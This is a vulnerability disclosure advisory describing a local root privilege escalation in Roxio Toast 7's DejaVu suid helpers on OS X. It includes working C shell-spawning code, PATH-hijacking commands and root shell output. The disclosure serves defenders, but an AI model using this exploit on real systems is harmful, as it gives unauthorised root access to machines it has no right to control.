Netragard Security Advisory 2006-06-24

Date: 27 Aug 2006. Reported by: Adriel T. Desautels. Type: packetstorm. Source: packetstormsecurity.com

Netragard Security Advisory 2006-06-24, Roxio Toast 7 Titanium Local Root Compromise Vulnerability

Code
`
  
**********************************************************************  
Netragard, L.L.C. -- Vulnerability Research and Exploitation Team  
  
www.netragard.com   
  
[Advisory Information]  
- ----------------------------------------------------------------------  
Contact: : Adriel T. Desautels  
Advisory ID : NETRAGARD-20060624  
Product Name : Roxio Toast  
Product Version : 7 Titanium  
Vendor Name : Roxio  
Type of Vulnerability : Local Root Compromise  
Effort : Easy  
Operating System : OSX  
Other : Insecure usage of $PATH  
  
  
  
[Product Description]  
- ----------------------------------------------------------------------  
"Toast 7 is the best way to save, share and enjoy a lifetime of digital  
music, movies and photos on CD and DVD. Burn large files across  
multiple discs; compress and copy DVD movies; add over 50 hours of  
music to an audio DVD with on-screen TV menus, shuffle play, and rich  
Dolby Digital sound; burn DivX files into DVDs. Do it all with the  
fastest and most reliable burning software for the Mac OS - Toast."  
  
- --http://www.roxio.com--  
  
  
  
[Technical Summary]  
- ----------------------------------------------------------------------  
A default installation of Roxio Toast 7 Titanium also installs DejaVu,  
a backup utility. DejaVu ships a control panel helper application that  
makes insecure system() calls. More specifically, a local attacker can  
exploit these system() calls through the user-controlled $PATH  
environment variable and gain root access to the system.  
  
  
  
[Technical Details]  
- ----------------------------------------------------------------------  
  
This was tested using a configured version of Roxio Toast 7 Titanium.  
  
  
Roxio Toast 7 contains locally exploitable vulnerabilities due to  
insecure system() calls made by suid binaries that inherit the user's  
$PATH environment variable.  
  
The following shows the DejaVu suid binaries:  
  
netragard-test-1$ find . -perm -4000  
./DejaVu.prefPane/Contents/Resources/abort_backup  
./DejaVu.prefPane/Contents/Resources/archive_table  
./DejaVu.prefPane/Contents/Resources/install_crontab  
./DejaVu.prefPane/Contents/Resources/install_scripts  
./DejaVu.prefPane/Contents/Resources/manual_backup  
./DejaVu.prefPane/Contents/Resources/remove_scripts  
  
  
1-Exploitation is trivial. A user must first create a small program such  
as the one shown in simple.c below.  
  
netragard-test-1$ cat > simple.c  
  
#include <stdlib.h>  
#include <unistd.h>  
  
int main(void)  
{  
    /* adopt the effective and real uid/gid of root, then start an interactive shell */  
    seteuid(0);  
    setuid(0);  
    setegid(0);  
    setgid(0);  
    system("/bin/sh -i");  
    return 0;  
}  
  
2-Once the user has created the program, the user must compile it, copy  
it into a directory under the names rm, mv and cat, and place that  
directory at the front of the $PATH variable.  
  
netragard-test-1$ cc -o chmod simple.c  
netragard-test-1$ cp chmod /tmp/rm  
netragard-test-1$ cp chmod /tmp/mv  
netragard-test-1$ cp chmod /tmp/cat  
netragard-test-1$ export PATH=/tmp/:$PATH  
  
3-Once the user has finished with step 2, the user must then launch  
the "System Preferences" control panel.  
  
netragard-test-1$/Applications/System\  
Preferences.app/Contents/MacOS/System\ Preferences  
  
4-After the user has launched the System Preferences application, a  
GUI window should appear. From that window click on "Deja Vu", located  
in the "Other" section. From there create a manual backup and then  
click the backup button. At that point you should be presented with a  
root shell prompt:  
  
sh: no job control in this shell  
sh-2.05b# id  
  
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),  
79(appserverusr), 80(admin)  
  
  
  
[Proof Of Concept]  
- ----------------------------------------------------------------------  
Successfully created and functional.  
  
  
  
[Vendor Status]  
- ----------------------------------------------------------------------  
Vendor contacted and notified of the issue.  
  
Vendor Comment:  
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio  
Toast and is third party software. Deja Vu is authored by Propaganda  
Productions and not Sonic.  
  
  
[About Netragard]  
- ----------------------------------------------------------------------  
Netragard offers specialized application and network security services  
which enable its clients to take a proactive security stance. Each of  
our services is driven by security professionals who specialize in  
specific areas of Information Security. This specialized focus  
differentiates Netragard from the competition by enabling Netragard  
to produce deliverables which are the product of skilled security  
professionals and not the product of automated tools and scripts.  
  
  
[ For more information please visit http://www.netragard.com ]  
  
  
[Disclaimer]  
- ---------------------http://www.netragard.com-------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
- --  
  
  
Regards,  
Netragard Vulnerability Research Team  
advisories at netragard dot com  
http://www.netragard.com  
-------------------------  
"We make I.T. Secure"  
`
